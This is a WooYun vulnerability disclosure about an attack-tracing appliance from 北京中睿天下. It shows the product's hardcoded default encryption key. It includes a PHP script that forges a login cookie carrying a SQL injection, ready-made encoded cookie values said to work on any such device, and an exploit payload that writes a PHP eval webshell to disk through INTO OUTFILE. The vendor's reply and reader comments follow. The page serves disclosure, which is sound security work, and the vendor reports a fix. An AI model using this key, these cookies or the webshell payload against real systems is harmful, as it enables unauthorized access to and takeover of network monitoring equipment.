当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(42) 关注此漏洞

缺陷编号: WooYun-2016-171979

漏洞标题: 某攻击溯源系统漏洞(影响客户核心网段与敏感监控信息)

相关厂商: 北京中睿天下信息技术有限公司

漏洞作者: 艺术家

提交时间: 2016-01-22 18:03

修复时间: 2016-03-09 18:36

公开时间: 2016-03-09 18:36

漏洞类型: 未授权访问/权限绕过

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

12人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-22: 细节已通知厂商并且等待厂商处理中
2016-01-26: 厂商已经确认,细节仅向厂商公开
2016-02-05: 细节向核心白帽子及相关领域专家公开
2016-02-15: 细节向普通白帽子公开
2016-02-25: 细节向实习白帽子公开
2016-03-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

设备部署在内网,与内网监控的主机设备是直接连通或者与主干路由是连通的。设备需要连接外网,云联动。
放手上太久了,真心要放出来了。

详细说明:

需要云联运故名思意就是要与云上面同步规则与下发一些规则,还有一些IP上面的大数据联动与其他分析。

漏洞证明:

写看com_function.php



code 区域
/**


 * 


 * 全局用户登录信息


 */


function global_user_info () {


	global $db, $_COOKIE;


	


	if (!isset($_COOKIE['user_key'])) return array();


	


	# 解析用户登录KEY


	$user_key = str_authcode($_COOKIE['user_key'], 'DECODE');


	if (!$user_key) return array();


	$key_arr = json_decode($user_key, true);


	


	# 检测登录


	$cu_name = $key_arr['cu_name'];


	$cu_type = intval($key_arr['cu_type']);


	$cu_key = $key_arr['cu_key'];


	$login = $db->query_one("SELECT * FROM center_user_login WHERE cu_name='$cu_name' AND cu_key='$cu_key'");


	if (!$login) return array();


	


	# 返回登录信息


	$ret = array(


		'cu_name'	=>	$cu_name,


		'cu_type'	=>	$cu_type,


		'cu_key'	=>	$cu_key


	);


	return $ret;


}





/**


 * 全局用户退出


 */


function global_login_out () {


	global $db, $USER_INFO;


	


	if (!$USER_INFO) exit('ok');


	


	# 清除数据库登录信息


	$cu_name = $USER_INFO['cu_name'];


	$cu_key = $USER_INFO['cu_key'];


	$db->query("DELETE FROM center_user_login WHERE cu_name='$cu_name' AND cu_key='$cu_key'");


	


	# 清除登录信息


	setcookie('user_key', '');


	


	# 返回


	exit('ok');


}





/**


 * 用户登陆和权限判断


 */


function global_user_permiss ($type=0) {


	global $USER_INFO;


	


	# 得到参数


	$cu_name = $USER_INFO['cu_name'] ? $USER_INFO['cu_name'] : '';


	$cu_type = $USER_INFO['cu_type'] ? intval($USER_INFO['cu_type']) : 0;


	


	# 判断是否登陆


	if (!$cu_name) {


		header("Location: login.php"); 


		exit;


	}


	


	# 用户登陆判断用户权限


	if ($type && $cu_type < $type) {


		header("Location: index.php"); 


		exit;


	}


	return;


}





/**


 * 登录密码加密


 * @param 用户名 $uname


 * @param 密码 $upwd


 */


function user_pwd_encry ($uname, $upwd) {


	


	# 判断


	if (!$uname || !$upwd) return false;


	


	# 密码加密


	$pwd = md5(md5($uname) . md5($upwd));


	return $pwd;


}








/**


 * 字符串解密加密.


 * @param $string - 要加密或解密的字符串.


 * @param $operation - = 'ENCODE' 表示加密; = 'DECODE' 表示解密.


 * @param $key - 加密密钥, 若未给出则使用全局变量CT_KEY


 * @param $expiry - ? 过期时间


 * @return 返回加密或解密结果字符串


 */


function str_authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {





	$ckey_length = 4;	// 随机密钥长度 取值 0-32;


				// 加入随机密钥,可以令密文无任何规律,即便是原文和密钥完全相同,加密结果也会每次不同,增大破解难度。


				// 取值越大,密文变动规律越大,密文变化 = 16 的 $ckey_length 次方


				// 当此值为 0 时,则不产生随机密钥


	$key = md5($key ? $key : CT_KEY);	// 如果未给出 $key, 使用全局变量CT_KEY. 


	$keya = md5(substr($key, 0, 16));	// $key 前半部分再一次 md5, $keya = 32字节长字符串


	$keyb = md5(substr($key, 16, 16));	// $key 后半部分再一次 md5, $keya = 32字节长字符串


	// $keyc 对于 'DECODE' 取 $string 的前4个字符; 对于 'ENCODE' 是取 microtime() 随机后4个字符, 说起来应该更随机.


	$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';


	


	$cryptkey = $keya . md5($keya . $keyc);		// 64 字节长字符串.


	$key_length = strlen($cryptkey);





	// 加密


	$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;


	$string_length = strlen($string);





	$result = '';


	$box = range(0, 255);





	// 下面为加密/解密过程. 具体加密算法还不太熟悉.


	$rndkey = array();


	for($i = 0; $i <= 255; $i++) {


		$rndkey[$i] = ord($cryptkey[$i % $key_length]);


	}





	for($j = $i = 0; $i < 256; $i++) {


		$j = ($j + $box[$i] + $rndkey[$i]) % 256;


		$tmp = $box[$i];


		$box[$i] = $box[$j];


		$box[$j] = $tmp;


	}





	for($a = $j = $i = 0; $i < $string_length; $i++) {


		$a = ($a + 1) % 256;


		$j = ($j + $box[$a]) % 256;


		$tmp = $box[$a];


		$box[$a] = $box[$j];


		$box[$j] = $tmp;


		$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));


	}





	if($operation == 'DECODE') {


		if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {


			return substr($result, 26);


		} else {


			return '';


		}


	} else {


		return $keyc.str_replace('=', '', base64_encode($result));


	}


}





重要

code 区域
# 解析用户登录KEY


	$user_key = str_authcode($_COOKIE['user_key'], 'DECODE');


	if (!$user_key) return array();


	$key_arr = json_decode($user_key, true);


	


	# 检测登录


	$cu_name = $key_arr['cu_name'];


	$cu_type = intval($key_arr['cu_type']);


	$cu_key = $key_arr['cu_key'];


	$login = $db->query_one("SELECT * FROM center_user_login WHERE cu_name='$cu_name' AND cu_key='$cu_key'");


	if (!$login) return array();


	


	# 返回登录信息


	$ret = array(


		'cu_name'	=>	$cu_name,


		'cu_type'	=>	$cu_type,


		'cu_key'	=>	$cu_key


	);


	return $ret;


}





跟踪下:str_authcode函数



code 区域
function str_authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {





	$ckey_length = 4;	// 随机密钥长度 取值 0-32;


				// 加入随机密钥,可以令密文无任何规律,即便是原文和密钥完全相同,加密结果也会每次不同,增大破解难度。


				// 取值越大,密文变动规律越大,密文变化 = 16 的 $ckey_length 次方


				// 当此值为 0 时,则不产生随机密钥


	$key = md5($key ? $key : CT_KEY);	// 如果未给出 $key, 使用全局变量CT_KEY. 


	$keya = md5(substr($key, 0, 16));	// $key 前半部分再一次 md5, $keya = 32字节长字符串


	$keyb = md5(substr($key, 16, 16));	// $key 后半部分再一次 md5, $keya = 32字节长字符串


	// $keyc 对于 'DECODE' 取 $string 的前4个字符; 对于 'ENCODE' 是取 microtime() 随机后4个字符, 说起来应该更随机.


	$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';


	


	$cryptkey = $keya . md5($keya . $keyc);		// 64 字节长字符串.


	$key_length = strlen($cryptkey);





	// 加密


	$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;


	$string_length = strlen($string);





	$result = '';


	$box = range(0, 255);





	// 下面为加密/解密过程. 具体加密算法还不太熟悉.


	$rndkey = array();


	for($i = 0; $i <= 255; $i++) {


		$rndkey[$i] = ord($cryptkey[$i % $key_length]);


	}





	for($j = $i = 0; $i < 256; $i++) {


		$j = ($j + $box[$i] + $rndkey[$i]) % 256;


		$tmp = $box[$i];


		$box[$i] = $box[$j];


		$box[$j] = $tmp;


	}





	for($a = $j = $i = 0; $i < $string_length; $i++) {


		$a = ($a + 1) % 256;


		$j = ($j + $box[$a]) % 256;


		$tmp = $box[$a];


		$box[$a] = $box[$j];


		$box[$j] = $tmp;


		$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));


	}





	if($operation == 'DECODE') {


		if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {


			return substr($result, 26);


		} else {


			return '';


		}


	} else {


		return $keyc.str_replace('=', '', base64_encode($result));


	}


}





使用的discuz的加密。那so..........

key值为默认值:

define('CT_KEY', '503d2a62fbe03250c61da3655a717748');



剩下的就好理解了。

code 区域
$key_arr = json_decode($user_key, true);



code 区域
$ret = array(


		'cu_name'	=>	$cu_name,


		'cu_type'	=>	$cu_type,


		'cu_key'	=>	$cu_key


	);



json话一下。加一下密就OK了。



重要一句话:

$login = $db->query_one("SELECT * FROM center_user_login WHERE cu_name='$cu_name' AND cu_key='$cu_key'");

这里也就是说。注入点cu_name, cu_key其他都是可以的。

那这里就加密一下。

--

code 区域
<?php


/**


 * $string 明文或密文


 * $operation 加密ENCODE或解密DECODE


 * $key 密钥


 * $expiry 密钥有效期


 */ 


function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {


    // 动态密匙长度,相同的明文会生成不同密文就是依靠动态密匙


    // 加入随机密钥,可以令密文无任何规律,即便是原文和密钥完全相同,加密结果也会每次不同,增大破解难度。


    // 取值越大,密文变动规律越大,密文变化 = 16 的 $ckey_length 次方


    // 当此值为 0 时,则不产生随机密钥


    $ckey_length = 4;


  


    // 密匙


    // $GLOBALS['discuz_auth_key'] 这里可以根据自己的需要修改


    $key = md5($key ? $key : $GLOBALS['discuz_auth_key']); 


  


    // 密匙a会参与加解密


    $keya = md5(substr($key, 0, 16));


    // 密匙b会用来做数据完整性验证


    $keyb = md5(substr($key, 16, 16));


    // 密匙c用于变化生成的密文


    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';


    // 参与运算的密匙


    $cryptkey = $keya.md5($keya.$keyc);


    $key_length = strlen($cryptkey);


    // 明文,前10位用来保存时间戳,解密时验证数据有效性,10到26位用来保存$keyb(密匙b),解密时会通过这个密匙验证数据完整性


    // 如果是解码的话,会从第$ckey_length位开始,因为密文前$ckey_length位保存 动态密匙,以保证解密正确


    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;


    $string_length = strlen($string);


    $result = '';


    $box = range(0, 255);


    $rndkey = array();


    // 产生密匙簿


    for($i = 0; $i <= 255; $i++) {


        $rndkey[$i] = ord($cryptkey[$i % $key_length]);


    }


    // 用固定的算法,打乱密匙簿,增加随机性,好像很复杂,实际上并不会增加密文的强度


    for($j = $i = 0; $i < 256; $i++) {


        $j = ($j + $box[$i] + $rndkey[$i]) % 256;


        $tmp = $box[$i];


        $box[$i] = $box[$j];


        $box[$j] = $tmp;


    }


    // 核心加解密部分


    for($a = $j = $i = 0; $i < $string_length; $i++) {


        $a = ($a + 1) % 256;


        $j = ($j + $box[$a]) % 256;


        $tmp = $box[$a];


        $box[$a] = $box[$j];


        $box[$j] = $tmp;


        // 从密匙簿得出密匙进行异或,再转成字符


        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));


    }


    if($operation == 'DECODE') {


        // substr($result, 0, 10) == 0 验证数据有效性


        // substr($result, 0, 10) - time() > 0 验证数据有效性


        // substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16) 验证数据完整性


        // 验证数据有效性,请看未加密明文的格式


        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {


            return substr($result, 26);


        } else {


            return '';


        }


    } else {


        // 把动态密匙保存在密文里,这也是为什么同样的明文,生产不同密文后能解密的原因


        // 因为加密后的密文可能是一些特殊字符,复制过程可能会丢失,所以用base64编码


        return $keyc.str_replace('=', '', base64_encode($result));


    }


}


 


$array = array(


   'cu_name'=>"hacker' OR 1 LIMIT 1#",  


   'cu_type'=>9,  


   'cu_key'=>"123",  


);   


$c = json_encode($array);


echo authcode($c, "ENCODE", "503d2a62fbe03250c61da3655a717748");





?>





得到加密结果:

xxx.jpg



这样因为COOKIES是直接代入。那只需要修改COOKIES就OK了。



设置cookie, user_key的值为

code 区域
8586OUNS98IqbV6GGqHeoMjOjEAdaXc/2IpKP+/6O1ynqC8EbTvpqtCrAjuzVVN7qpBpEe7e8v5tmeHE3Q1/fsla6vaRpjeyIr7Dp9NSUsjt6FtEmJzJwr0



因为有+号所有要url编码一下。

code 区域
%38%35%38%36%4F%55%4E%53%39%38%49%71%62%56%36%47%47%71%48%65%6F%4D%6A%4F%6A%45%41%64%61%58%63%2F%32%49%70%4B%50%2B%2F%36%4F%31%79%6E%71%43%38%45%62%54%76%70%71%74%43%72%41%6A%75%7A%56%56%4E%37%71%70%42%70%45%65%37%65%38%76%35%74%6D%65%48%45%33%51%31%2F%66%73%6C%61%36%76%61%52%70%6A%65%79%49%72%37%44%70%39%4E%53%55%73%6A%74%36%46%74%45%6D%4A%7A%4A%77%72%30





xxx.png





因为其KEY值一样。所以上面生成的COOKIES值可以在任意睿眼设备上面登陆。





应该其mysql权限为root .所以可以试着去写shell.



我给出EXP:

code 区域
{"cu_name":"bigjj","cu_type":9,"cu_key":"jjfly' UNION SELECT 111,0x3c3f70687020406576616c28245f524551554553545b276269676a6a275d293b3f3e,333 into outfile '/tmp/showtime.php'#"}



网站目录为/var/www/html/

写入shell加密为:

code 区域
%34%38%65%61%4c%47%55%56%63%50%66%36%4e%4f%43%63%59%67%64%64%6f%75%57%6c%4d%5a%45%79%67%6b%45%43%6b%66%32%2b%57%78%6a%59%4c%45%39%78%63%73%47%59%69%59%6f%4b%48%5a%61%61%77%71%74%4d%47%31%32%30%71%30%35%68%78%4f%50%30%6f%42%46%31%68%43%32%61%4c%70%42%71%44%43%7a%79%36%67%78%32%39%4b%70%64%72%6e%33%4f%39%61%34%79%77%31%2b%31%72%64%37%6c%45%50%66%53%44%32%74%78%76%2f%62%58%67%37%72%42%31%4c%46%33%56%72%72%44%59%43%76%70%55%30%50%53%74%4a%32%73%32%79%62%69%76%4a%46%50%69%79%74%78%52%79%69%55%38%38%54%6a%51%71%42%71%34%35%47%4c%46%76%53%4c%70%79%79%30%66%57%6e%45%71%57%68%4b%7a%6f%5a%64%46%6d%2f%71%62%4d%37%78%63%50%61%52%71%2f%75%41%6d%36%42%42%45%34%33%4a%66%34%57%53%7a%68%2b%4f%69%54%55%38%54%6c%6a%4f%75%4c%33%73%6a%6d%63%54%42%47%49%4e%69%55%75%68%73%44%57%66%6e%6b%4f%46%74%67%54%2f%37%50%48%70%6d%51%6d%6c%58%47%77



1xxx.jpg







修复方案:

版权声明:转载请注明来源 艺术家@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-26 11:59

厂商回复:

真诚的感谢作者对中睿天下的关注,对于这个漏洞我们做了及时的跟进和修复。与此同时,我们的奖励也已经发放,请注意查收。最后再次感谢对中睿天下做出重大贡献白帽子们,我们铭记在心。

最新状态:

2016-03-09:漏洞已修复,谢谢乌云白帽

2016-03-09:漏洞已修复,谢谢乌云白帽

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2016-03-09 20:18 | 默之 ( 普通白帽子 | Rank:1437 漏洞数:241 | 沉淀。)
    1

    很详细!

    1# 回复此人
  2. 2016-03-10 09:09 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1854 漏洞数:296 | 风暴网络安全空间: http://www.heysec.or...)
    1

    @默之 没看懂他代码怎么获取的额

    2# 回复此人
  3. 2016-03-10 10:27 | 默之 ( 普通白帽子 | Rank:1437 漏洞数:241 | 沉淀。)
    1

    @HackBraid 我也没看出来额。。可能是以前当下来的

    3# 回复此人
  4. 2016-03-10 10:45 | 大漠長河 ( 实习白帽子 | Rank:66 漏洞数:10 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区枫叶正...)
    1

    值得细看

    4# 回复此人
  5. 2016-03-10 13:57 | 宇龙通信(酷派)(乌云厂商)
    1

    好长,没细看

    5# 回复此人
  6. 2016-03-10 14:35 | 来打我呀 ( 路人 | Rank:2 漏洞数:1 | 欢脱跳跃的小鲜肉~)
    1

    @宇龙通信(酷派) 你们的厂商介绍也好长。。。

    6# 回复此人

登录后才能发表评论,请先 登录